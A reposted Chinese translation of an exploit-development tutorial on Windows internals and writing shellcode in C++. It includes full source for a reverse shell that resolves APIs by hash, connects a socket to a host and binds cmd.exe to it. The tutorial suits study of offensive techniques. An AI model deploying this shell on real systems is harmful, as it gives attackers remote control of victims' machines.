转载

Exploit开发系列教程-Windows基础&shellcode

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows基础

0x00 Windows Basics

这篇文章简要讲述Windows开发者应该了解的一些常识。

0x01 Win32 API

Windows的主要API由多个DLLs（ Dynamic Link Libraries ）提供。某个应用可以从那些 DLL 中导入函数并且对它们进行调用。这样就保证了普通用户态应用程序的可移植性。

0x02 PE文件格式

执行体和 DLL 都是PE( Portable Executable )文件。每个PE含有一个导入和导出表。导入表指定导入函数以及这些函数所在的文件（模块）。导出表指定导出函数，等等。函数可以被导入到其它的PE文件。

PE 文件由多个节（ section ）组成（代码节，数据节，等等…）。在内存中， .reloc 节中具有重定位可执行体或 DLL 的信息。在内存中，虽然有些代码（例如相对的 jmp 指令）的地址是相对的，但是多数代码所在的地址是绝对的，这取决于被加载的模块。

Windows loader 从当前工作目录开始搜索 DLLs ，发布的某个应用可能具有一个不同于系统根（ /windows/system32 ）目录中的 DLL 。该版本方面的问题（不兼容）被一些人称作 DLL-hell 。

重要的是理解相对虚拟内存地址 ( Relative Virtual Address ，RVA)的概念。 PE 文件提供 RVAs 来指定模块的相对基地址。换句话说，在内存中，如果某个模块在地址B（基地址）上被加载并且某个元素在该模块中具有 RVA 为X这一偏移量，那么该元素的虚拟内存地址（ Virtual Address ，VA）偏移量为 B+X 。

0x03 线程

如果你过去经常使用Windows平台，那么应该非常了解线程的概念。但是，如果你经常使用的是Linux，那么请记住，Windows平台将会为线程提供 CPU 时间片。你可以用 CreateProcess() 创建新进程并且用 CreateThreads() 创建新线程。线程会在它们所在进程的地址空间内执行，因此它们所在的内存是共享的。

线程也会被一种称作TLS（ Thread Local Storage ）的机制限制，该机制为线程提供了非共享内存。

基本上，每个线程的 TEB 都含有一个 TLS 数组，它具有64个 DWORD 值，并且在运行过程中超出 TLS 数组的有效元素个数时，会为额外的 TLS 数组分配1024个 DWORD 值。首先，两个数组中的一个数组的每个元素会对应一个索引值，该索引值必须被分配或使用 TlsAlloc() 来得到，可以用 TlsGetValue (index) 来读取 DWORD 值并用 TlsSetValue (index, newValue)将其写入。如，在当前线程的 TEB 中， TlsGetValue (7)表示从 TLS 数组中索引值为7的地址上读取 DWORD 值。

笔记：我们可以通过使用 GetCurrentThreadId() 来模拟该机制，但是不会有一样的效果。

0x04 令牌

令牌通常用于描述访问权限。就像文件句柄那样，令牌仅仅是一个32位整数。每个进程具有一个内部结构，该结构含有关于访问权限的信息，它与令牌相关联。

令牌分为两种类型：主令牌和模仿令牌。无论何时，某个进程被创建后都会被分配一个主令牌。进程的每个线程都可以拥有进程的令牌，或从另一进程中获取模仿令牌。如果 LogonUser() 函数被调用，则会返回一个不能被使用于 CreateProcessAsUser() 的模仿令牌（提供凭据），除非你调用了 DupcateTokenEx 来将其转换为主令牌。

可以使用 SetThreadToken (newToken) 将某个令牌附加到当前线程并且可以使用 RevertToSelf() 来将该令牌删除，从而让线程的令牌还原为主令牌。

我们来了解下在Windows平台上，将某个用户连接到服务器并发送用户名和密码的情况。首先以 SYSTEM 身份运行服务器，将会调用具有凭据的 LogonUser() ，如果成功则返回新令牌。接着会在服务器创建新线程的同时调用 SetThreadToken (new_token)， new_token 参数是一个由 LogonUser() 返回的令牌值。这样，线程被执行时就具有与用户一样的权限。当线程完成了对客户端的服务时，或者会被销毁，或者将调用 revertToSelf() 而被添加到线程池的空闲线程队列中。

如果可以控制服务器，那么可通过调用 RevertToSelf() ，或在内存中查找其它的令牌并使用 SetThreadToken() 函数将它们附加到当前线程，从而恢复当前线程的权限，即 SYSTEM 权限。

值得注意的是， CreateProcess() 使用主令牌作为新进程的令牌。当具有比主令牌更高权限的模仿令牌的线程调用 CreateProcess() 时存在一个问题，那就是新进程的权限会低于创建该进程的线程。

解决方案是使用 DuplicateTokenEx() 从当前线程的模拟令牌中创建一个新的主令牌，接着通过调用具有新的主令牌的 CreateProcessAsUser() 创建新进程。

shellcode

0x00 介绍

Shellcode 是一段被 exploit 作为 payload 发送的代码，它被注入到存在漏洞的应用，并且会被执行。 Shellcode 是自包含的，并且应该不含有 null 字节。通常使用函数如 strcpy() 来复制 shellcode ，在进行该复制过程中遇到 null 字节时，将停止复制。这样做会导致 shellcode 不能被完全复制。 Shellcode 一般直接由汇编语言编写，但是，在这篇文章中，我们将通过 Visual Studio 2013 使用 c/c++ 来开发 shellcode 。在该开发环境下进行开发的好处如下：

1.花费更短的开发时间。

2.智能提示（ intellisense ）。

3.易于调试。

我们将使用 VS2013 来生成一个具有 shellcode 的执行体，也将使用 python 脚本来提取并修复（移除 null 字节） shellcode 。

0x01 C/C++ 代码

仅仅使用栈变量

为了编写浮动地址代码（ position independent code ），我们必须使用栈变量。这意味着我们不能这么写。

char *v = new char[100];

因为那数组将被分配到栈。根据绝对地址，试着从 msvcr120.dll 中调用 new 函数：

00191000 6A 64                push        64h 00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

地址 192090h 上包含函数的地址。在没有依赖导入表以及 Windows loader 的情况下，要调用某库中已导入的函数，我们必须直接这么做。另一个存在的问题是，新操作符可能需要某种通过 c/c+ +语言编写的运行时组件来完成的初始化操作。

不能使用全局变量：

int x;   int main() {   x = 12; }

上面的代码 (如果没有被优化)生成如下：

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

地址 8E9130h 为变量x的绝对地址。

如果我们编写如下，会导致字符串存在问题

char str[] = "I'm a string";  printf(str);

字符串将被放入执行体的 .rdata 节中，并且会对其进行绝对地址引用。

在 shellcode 中不得使用 printf ：这只是一个了解 str 如何被引用的范例。

这是 asm 代码：

00A71006 8D 45 F0             lea         eax,[str] 00A71009 56                   push        esi 00A7100A 57                   push        edi 00A7100B BE 00 21 A7 00       mov         esi,0A72100h 00A71010 8D 7D F0             lea         edi,[str] 00A71013 50                   push        eax 00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi] 00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

正如你所看到的，字符串位于 .rdata 节中，地址为 A72100h ，通过 movsd 和 movsb 指令的执行，它会被复制进栈（ str 指向栈）。注意： A72100h 为绝对地址。显然该代码不是地址无关的。

如果我们这样写：

char *str = "I'm a string"; printf(str);

那么字符串仍然会被放入.data节，但不会被复制进栈：

00A31000 68 00 21 A3 00       push        0A32100h 00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

字符串在 .rdata 节中，绝对地址为 A32100h 。

如何让该代码地址无关?

更简单的（部分）解决方案：

char str[] = { 'I', '/'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '/0' }; printf(str);

对应的汇编代码如下：

012E1006 8D 45 F0             lea         eax,[str] 012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h 012E1010 50                   push        eax 012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h 012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h 012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0 012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

除了对 printf 的调用外，该段代码是地址无关的，因为字符串部分被直接编码进了 mov 指令的源操作数中。一旦该字符串在栈上，则可以被使用。

不幸的是，当字符串达到一定长度时，该方法就失效了。代码为：

char str[] = { 'I', '/'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '/0' }; printf(str);

生成

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h] 013E100E 8D 45 E8             lea         eax,[str] 013E1011 50                   push        eax 013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0 013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h 013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh 013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0 013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

正如你所看到的，当字符串的其它部分像之前那样被编码进mov指令的源操作数中时，字符串部分将被定位在.rdata节中，地址为13E2100h。

我已提出的解决方案如下：

char *str = "I'm a very long string";

同时使用 Python 脚本修复 shellcode 。该脚本需要从 .rdata 节中提取被引用的字符串，并将它们放入到 shellcode 中，然后修复重定位信息。我们马上会了解到该实现方法。

不直接调用Windows API

在 C/C++ 代码中，我们不能编写

WaitForSingleObject(procInfo.hProcess, INFINITE);

因为 kernel32.dll 中已导入了“ WaitForSingleObject ”函数。

在 nutshell 中， PE 文件含有导入表和导入地址表（ IAT ）。导入表含有被导入到库中的函数的信息。当执行体被加载时，通过 Windows loader 编译 IAT ，并且其含有已导入的函数地址。该执行体的代码用间接寻址调用已导入到库中的函数。例如：

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

地址 1D2094h 为入口地址（在 IAT 中），该地址含有函数 MessageBoxA 的地址。因为如上调用函数的地址无需被修复（除非执行体被重定位），所以可以直接使用该地址。 Windows loader 只需要修复的是在 1D2094h 地址，该 dword 值是 MessageBoxA 函数的地址。

解决方案是直接从 Windows 的数据结构中得到 Windows 的函数地址。之后我们将会了解到。

创建新项目

通过 File→New→Project… , 选择 Installed→Templates→Visual C++→Win32→Win32 Console Application , 为项目命名 (我将其命名为 shellcode ) 接着点击OK。

通过 Project→<project name> properties 将出现新会话框。通过将 Configuration （会话的左上方）设置为 All Configurations 将修改应用到所有配置（ Release 和 Debug ）。接着，展开 Configuration Properties 并且在 General 下修改 Platform Toolset 。该编译器为 Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013)。

这样你将可以使用 C++11 和 C++14 的一些特性，如 static_assert 。

Shellcode范例

这是一段简单的反向 shell 代码（定义）。将命名为 shellcode.cpp 的文件添加到项目中并将该代码复制到 shellcode.cpp 。不要试图理解所有的代码。后面我们还会对其进行进一步的讨论。

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015) // NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP". #include <WinSock2.h>      // must preceed #include <windows.h> #include <WS2tcpip.h> #include <windows.h> #include <winnt.h> #include <winternl.h> #include <stddef.h> #include <stdio.h> #define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8)) _inline PEB *getPEB() {  PEB *p;  __asm {   mov  eax, fs:[30h]   mov  p, eax  }  return p; } DWORD getHash(const char *str) {  DWORD h = 0;  while (*str) {   h = (h >> 13) | (h << (32 - 13));    // ROR h, 13   h += *str >= 'a' ? *str - 32 : *str; // convert the character to uppercase   str++;  }  return h; } DWORD getFunctionHash(const char *moduleName, const char *functionName) {  return getHash(moduleName) + getHash(functionName); } LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {  int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);  return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset); } // NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to //    ntdll.RtlExitUserThread. The solution is to follow the forwards manually. PVOID getProcAddrByHash(DWORD hash) {  PEB *peb = getPEB();  LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;  LIST_ENTRY *ptr = first;  do {       // for each module   LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);   ptr = ptr->Flink;   BYTE *baseAddress = (BYTE *)dte->DllBase;   if (!baseAddress)     // invalid module(???)    continue;   IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;   IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);   DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;   if (!iedRVA)    // Export Directory not present    continue;   IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);   char *moduleName = (char *)(baseAddress + ied->Name);   DWORD moduleHash = getHash(moduleName);   // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th   // element of both arrays refer to the same function. The first array specifies the name whereas   // the second the ordinal. This ordinal can then be used as an index in the array pointed to by   // AddressOfFunctions to find the entry point of the function.   DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);   for (DWORD i = 0; i < ied->NumberOfNames; ++i) {    char *functionName = (char *)(baseAddress + nameRVAs[i]);    if (hash == moduleHash + getHash(functionName)) {     WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];     DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];     return baseAddress + functionRVA;    }   }  } while (ptr != first);  return NULL;   // address not found } #define HASH_LoadLibraryA     0xf8b7108d #define HASH_WSAStartup    0x2ddcd540 #define HASH_WSACleanup    0x0b9d13bc #define HASH_WSASocketA    0x9fd4f16f #define HASH_WSAConnect    0xa50da182 #define HASH_CreateProcessA   0x231cbe70 #define HASH_inet_ntoa     0x1b73fed1 #define HASH_inet_addr     0x011bfae2 #define HASH_getaddrinfo   0xdc2953c9 #define HASH_getnameinfo   0x5c1c856e #define HASH_ExitThread    0x4b3153e0 #define HASH_WaitForSingleObject 0xca8e9498 #define DefineFuncPtr(name)  decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name) int entryPoint() { //  printf("0x%08x/n", getFunctionHash("kernel32.dll", "WaitForSingleObject")); //  return 0;  // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but  //    they're not strictly needed.  DefineFuncPtr(LoadLibraryA);  My_LoadLibraryA("ws2_32.dll");  DefineFuncPtr(WSAStartup);  DefineFuncPtr(WSASocketA);  DefineFuncPtr(WSAConnect);  DefineFuncPtr(CreateProcessA);  DefineFuncPtr(inet_ntoa);  DefineFuncPtr(inet_addr);  DefineFuncPtr(getaddrinfo);  DefineFuncPtr(getnameinfo);  DefineFuncPtr(ExitThread);  DefineFuncPtr(WaitForSingleObject);  const char *hostName = "127.0.0.1";  const int hostPort = 123;  WSADATA wsaData;  if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))   goto __end;   // error  SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);  if (sock == INVALID_SOCKET)   goto __end;  addrinfo *result;  if (My_getaddrinfo(hostName, NULL, NULL, &result))   goto __end;  char ip_addr[16];  My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);  SOCKADDR_IN remoteAddr;  remoteAddr.sin_family = AF_INET;  remoteAddr.sin_port = htons(hostPort);  remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);  if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))   goto __end;  STARTUPINFOA sInfo;  PROCESS_INFORMATION procInfo;  SecureZeroMemory(&sInfo, sizeof(sInfo));  // avoids a call to _memset  sInfo.cb = sizeof(sInfo);  sInfo.dwFlags = STARTF_USESTDHANDLES;  sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;  My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);  // Waits for the process to finish.  My_WaitForSingleObject(procInfo.hProcess, INFINITE); __end:  My_ExitThread(0);  return 0; } int main() {  return entryPoint(); }

编译器配置

通过 Project→<project name> properties , 展开 Configuration Properties 接着选择 C/C++ 。应用修改后的 Release 配置。

这里是需要修改的设置：

General:
- oSDL Checks: No (/sdl-)

这可能并不需要，但是我已将它们关闭了。

Optimization:
- Optimization: Minimize Size (/O1)

这很重要！我们得尽可能将 shellcode 简短。

* Inline Function Expansion: Only __inline (/Ob1)

使用这个设置告诉 VS 2013 只用 _inline 来定义内联函数。 main() 仅调用 shellcode 的函数 entryPoint 。如果函数 entryPoint 是简短的，那么它可能会被内联进 main() 。这将是极糟的，因为 main() 将不再透露 shellcode 的后一部分（事实上它包含了该部分）。后面会了解到原因。

* Enable Intrinsic Functions: Yes (/Oi)

我不知道该设置是否应该关闭。

* Favor Size Or Speed: Favor small code (/Os)  * Whole Program Optimization: Yes (/GL)

Code Generation:
- Security Check: Disable Security Check (/GS-)

不需要安全检查!

* Enable Function-Level linking: Yes (/Gy)

linker配置

通过 Project→<project name> properties , 展开 Configuration Properties 接着查看 Linker 。应用修改后的 Release 配置。这里是你需要修改的相关设置：

General:
- Enable Incremental Linking: No (/INCREMENTAL:NO)
Debugging:
- Generate Map File: Yes (/MAP)

告诉 linker 生成含有 EXE 结构的映射文件。

* Map File Name: mapfile

这是映射文件名。可自定义文件名。

Optimization:
- References: Yes (/OPT:REF)

该选项对于生成简短的 shellcode 来说非常重要，因为可以除去函数以及不被代码引用的数据。

* Enable COMDAT Folding: Yes (/OPT:ICF)  * Function Order: function_order.txt

应用该设置读取命名为 function_order.txt 的文件，该文件指定必须出现在代码节中函数的顺序。我们要将函数 entryPoint 变为代码节中的第一个函数，可想而知， function_order.txt 中必存在一行代码含有字符串 ?entryPoint@@YAHXZ 。可以在映射文件中找到该函数名。

getProcAddrByHash

该函数返回由某个出现在内存中的模块（ .exe 或 .dll ）导出的某个函hash数的地址，已给出的``值与模块和函数相关联。当然，通过名字查找函数具有一定的可能性，但是这样做需要考虑空间方面的问题，因为那些名字应该被包含在 shellcode 中。在另一方面，一个 hash 仅有4个字节。因为我们不使用两个 hash （一个用于模块，一个用于函数）， getProcAddrByHash 需要考虑所有被加载进内存中的模块。

通过 user32.dll 导出函数 MessageBoxA ，该函数的 hash 值可通过如下方法计算：

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

计算出的 hash 值为 getHash (“user32.dll”) 与 getHash (“MessageBoxA”)的 hash 值的总和。函数 getHash 的实现简明易懂：

DWORD getHash(const char *str) {  DWORD h = 0;  while (*str) {   h = (h >> 13) | (h << (32 - 13));    // ROR h, 13   h += *str >= 'a' ? *str - 32 : *str; // convert the character to uppercase   str++;  }  return h; }

正如你可以了解到的， hash 值是大小写不敏感的（不区分大小写），重要的是，因为在内存中，某种Windows的版本所使用的字符串都为大写。首先， getProcAddrByHash 获取TEB( Thread Environment Block )的地址：

PEB *peb = getPEB(); where _inline PEB *getPEB() {  PEB *p;  __asm {   mov  eax, fs:[30h]   mov  p, eax  }  return p; }

选择子 fs 与某个始于 TEB 地址的段相关联。在偏移 30h 上， TEB 含有一个PEB( Process Environment Block )指针。用WinDbg可以观察到：

0:000> dt _TEB @$teb ntdll!_TEB +0x000 NtTib            : _NT_TIB +0x01c EnvironmentPointer : (null) +0x020 ClientId         : _CLIENT_ID +0x028 ActiveRpcHandle  : (null) +0x02c ThreadLocalStoragePointer : 0x7efdd02c Void +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB +0x034 LastErrorValue   : 0 +0x038 CountOfOwnedCriticalSections : 0 +0x03c CsrClientThread  : (null) <snip>

PEB 与当前的进程相关联，除了别的以外，含有关于某些模块的信息，这些模块都被加载到进程地址空间中。此处又是 getProcAddrByHash ：

PVOID getProcAddrByHash(DWORD hash) {  PEB *peb = getPEB();  LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;  LIST_ENTRY *ptr = first;  do {       // for each module   LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);   ptr = ptr->Flink;   .   .   .  } while (ptr != first);  return NULL;   // address not found }

此处为 PEB 部分:

0:000> dt _PEB @$peb ntdll!_PEB  +0x000 InheritedAddressSpace : 0 ''  +0x001 ReadImageFileExecOptions : 0 ''  +0x002 BeingDebugged  : 0x1 ''  +0x003 BitField   : 0x8 ''  +0x003 ImageUsesLargePages : 0y0  +0x003 IsProtectedProcess : 0y0  +0x003 IsLegacyProcess  : 0y0  +0x003 IsImageDynamicallyRelocated : 0y1  +0x003 SkipPatchingUser32Forwarders : 0y0  +0x003 SpareBits    : 0y000  +0x004 Mutant     : 0xffffffff Void  +0x008 ImageBaseAddress : 0x00060000 Void  +0x00c Ldr      : 0x76fd0200 _PEB_LDR_DATA  +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS  +0x014 SubSystemData  : (null)  +0x018 ProcessHeap  : 0x00680000 Void  <snip>

在偏移 0Ch 上，是一个被称作 Ldr 的字段，它是个 PEB_LDR_DATA 结构指针。使用 WinDbg 进行观察：

0:000> dt _PEB_LDR_DATA 0x76fd0200 ntdll!_PEB_LDR_DATA  +0x000 Length     : 0x30  +0x004 Initialized  : 0x1 ''  +0x008 SsHandle   : (null)  +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]  +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]  +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]  +0x024 EntryInProgress  : (null)  +0x028 ShutdownInProgress : 0 ''  +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList 是一个 LDR_DATA_TABLE_ENTRY 结构的双链表，它与当前进程的地址空间中所加载的模块相关联。更确切地说， InMemoryOrderModuleList 是一个 LIST_ENTRY ，它含有两个部分：

0:000> dt _LIST_ENTRY ntdll!_LIST_ENTRY +0x000 Flink            : Ptr32 _LIST_ENTRY +0x004 Blink            : Ptr32 _LIST_ENTRY

Flink 为前向链表， Blink 为后向链表。 Flink 指向第一个模块的 LDR_DATA_TABLE_ENTRY 。当然，未必就是如此：

Flink 指向一个被包含在结构 LDR_DATA_TABLE_ENTRY 中的 LIST_ENTRY 结构。

我们来观察 LDR_DATA_TABLE_ENTRY 是如何被定义的:

0:000> dt _LDR_DATA_TABLE_ENTRY ntdll!_LDR_DATA_TABLE_ENTRY +0x000 InLoadOrderLinks : _LIST_ENTRY +0x008 InMemoryOrderLinks : _LIST_ENTRY +0x010 InInitializationOrderLinks : _LIST_ENTRY +0x018 DllBase          : Ptr32 Void +0x01c EntryPoint       : Ptr32 Void +0x020 SizeOfImage      : Uint4B +0x024 FullDllName      : _UNICODE_STRING +0x02c BaseDllName      : _UNICODE_STRING +0x034 Flags            : Uint4B +0x038 LoadCount        : Uint2B +0x03a TlsIndex         : Uint2B +0x03c HashLinks        : _LIST_ENTRY +0x03c SectionPointer   : Ptr32 Void +0x040 CheckSum         : Uint4B +0x044 TimeDateStamp    : Uint4B +0x044 LoadedImports    : Ptr32 Void +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT +0x04c PatchInformation : Ptr32 Void +0x050 ForwarderLinks   : _LIST_ENTRY +0x058 ServiceTagLinks  : _LIST_ENTRY +0x060 StaticLinks      : _LIST_ENTRY +0x068 ContextInformation : Ptr32 Void +0x06c OriginalBase     : Uint4B +0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink 指向位于偏移为8的 _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks ，因此，我们必须减去8来获取 _LDR_DATA_TABLE_ENTRY 的地址。

首先，获取Flink指针:

+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]

它的值是 0x683080 ，因此 _LDR_DATA_TABLE_ENTRY 结构的地址为 0x683080 – 8 = 0x683078 :

0:000> dt _LDR_DATA_TABLE_ENTRY 683078 ntdll!_LDR_DATA_TABLE_ENTRY  +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]  +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]  +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]  +0x018 DllBase    : (null)  +0x01c EntryPoint   : (null)  +0x020 SizeOfImage  : 0x60000  +0x024 FullDllName  : _UNICODE_STRING "蒮ｍ쿟ﾹ엘ﾬ膪ｎ???"  +0x02c BaseDllName  : _UNICODE_STRING "C:/Windows/SysWOW64/calc.exe"  +0x034 Flags    : 0x120010  +0x038 LoadCount    : 0x2034  +0x03a TlsIndex   : 0x68  +0x03c HashLinks    : _LIST_ENTRY [ 0x4000 - 0xffff ]  +0x03c SectionPointer : 0x00004000 Void  +0x040 CheckSum   : 0xffff  +0x044 TimeDateStamp  : 0x6841b4  +0x044 LoadedImports  : 0x006841b4 Void  +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT  +0x04c PatchInformation : 0x4ce7979d Void  +0x050 ForwarderLinks : _LIST_ENTRY [ 0x0 - 0x0 ]  +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]  +0x060 StaticLinks  : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]  +0x068 ContextInformation : 0x00686418 Void  +0x06c OriginalBase   : 0x6851a8  +0x070 LoadTime   : _LARGE_INTEGER 0x76f0c9d0

正如你可以看到的，我正在用 WinDbg 调试 calc.exe ！不错：第一个模块是执行体本身。重要的是 DLLBase (c)字段。根据给出的模块的基地址，我们可以分析被加载到内存中的 PE 文件并获取所有信息，如已导出的函数地址。在 getProcAddrByHash 中我们所做的:

BYTE *baseAddress = (BYTE *)dte->DllBase;  if (!baseAddress)     // invalid module(???)   continue;  IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;  IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);  DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;  if (!iedRVA)    // Export Directory not present   continue;  IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);  char *moduleName = (char *)(baseAddress + ied->Name);  DWORD moduleHash = getHash(moduleName);  // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th  // element of both arrays refer to the same function. The first array specifies the name whereas  // the second the ordinal. This ordinal can then be used as an index in the array pointed to by  // AddressOfFunctions to find the entry point of the function.  DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);  for (DWORD i = 0; i < ied->NumberOfNames; ++i) {   char *functionName = (char *)(baseAddress + nameRVAs[i]);   if (hash == moduleHash + getHash(functionName)) {    WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];    DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];    return baseAddress + functionRVA;   }  }  .  .  .

了解PE文件格式的规范可以更好地理解该段代码，这里不详细讲解。在PE文件结构中需要注意的是RVA( Relative Virtual Addresses )。即相对于PE模块（ Dllbase ）中基地址的地址。例如，如果 RVA 是 100h 并且 DllBase 是 400000h ，那么指向数据的 RVA 为 400000h + 100h = 400100h 。该模块始于 DOS_HEADER 。它包含一个 NT_HEADERS 的 RVA (e_lfanew)。 FILE_HEADER 和 OPTIONAL_HEADERNT_HEADERS 存在于 NT_HEADERS 。 OPTIONAL_HEADER 含有一个被称作 DataDirectory 的数组，该数组指向 PE 模块的多个目录。了解 Export Directory 可参考链接 https://msdn.microsoft.com/en-us/library/ms809762.aspx 中提到的相关细节。

如下C结构体与 Export Directory 相关联，其定义如下：

typedef struct _IMAGE_EXPORT_DIRECTORY {  DWORD   Characteristics;  DWORD   TimeDateStamp;  WORD MajorVersion;  WORD MinorVersion;  DWORD   Name;  DWORD   Base;  DWORD   NumberOfFunctions;  DWORD   NumberOfNames;  DWORD   AddressOfFunctions;  // RVA from base of image  DWORD   AddressOfNames;   // RVA from base of image  DWORD   AddressOfNameOrdinals;  // RVA from base of image } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

DefineFuncPtr

DefineFuncPtr 是一个宏，它有助于定义一个已导入的函数指针. 这是范例:

#define HASH_WSAStartup           0x2ddcd540   #define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)   DefineFuncPtr(WSAStartup);

WSAStartup 函数是 ws2_32.dll 中已导入的函数，因此通过该方法计算 HASH_WSAStartup

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

当宏被展开时,

DefineFuncPtr(WSAStartup);

变为

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

decltype(WSAStartup) 为 WSAStartup 函数的类型。这样，我们无需重定义函数原型。注意：在 C++11 中有关于 decltype 的描述。

现在我们可通过 My_WSAStartup 调用 WSAStartup

注意：从模块中导入函数之前，我们需要确保已经在内存中加载了这个模块。

最简单的方法是使用 LoadLibrary 加载模块。

DefineFuncPtr(LoadLibraryA);   My_LoadLibraryA("ws2_32.dll");

该操作有效，因为 kernel32.dll 中已导入了 LoadLibrary ，正如我们说过的，它总会出现在内存中。

我们也可以导入 GetProcAddress 并使用它来获取所有其它我们需要的函数地址，但是没必要这么做，因为我们需要将所有的函数名包含在 shellcode 中。

entryPoint

显然， entryPoint 是 shellcode 和实现反向 shell 的入口点。首先，我们导入所有我们需要的函数，接着我们使用它们。细节不重要并且我不得不说 winsock API 的使用非常麻烦。

在 nutshell 中:

